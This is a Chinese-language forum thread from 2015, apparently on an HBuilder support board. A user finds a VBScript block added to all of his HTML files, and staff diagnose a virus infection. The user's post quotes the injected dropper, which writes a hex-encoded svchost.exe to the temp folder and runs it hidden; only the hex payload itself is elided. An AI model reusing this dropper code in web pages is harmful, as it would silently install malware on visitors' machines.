lzhou
lzhou
  • 发布:2015-02-19 01:13
  • 更新:2015-02-19 02:35
  • 阅读:1858

【报Bug】 Hbuilder 抓取 svchost.exe 进程信息??

分类:HBuilder

Hello,
【问题重现】

  1. 打开Hbuilder
  2. 新建Web项目。

--以下是可疑步骤。

  1. 打开微信网页版
  2. 随便对微信做操作

【现象】
所有该工作空间下所有项目的html文件结尾会被添加一段VBScript, 如下:
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "一长串16进制数"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

【影响】

  1. 所有html文件都被加上这段,浪费时间去处理。
  2. 不确定Hbuilder是否存在隐患抓取svchost.exe 信息?
2015-02-19 01:13 负责人:无 分享
已邀请:
DCloud_heavensoft

DCloud_heavensoft

杀毒吧,你这是中毒了。

  • lzhou (作者)

    我现在在编辑器里面随便点开一个html文件,会有Windows安全警告:在此页上的ActiveX控件和本页上的其他部分的交互可能不安全,您想允许这种交互吗?这个是中毒了?

    2015-02-19 13:54

  • DCloud_heavensoft

    回复 lzhou: 是中毒了。有病毒改动了你的HTML文件。HBuilder不会改你的文件的。

    2015-02-20 00:41

该问题目前已经被锁定, 无法添加新回复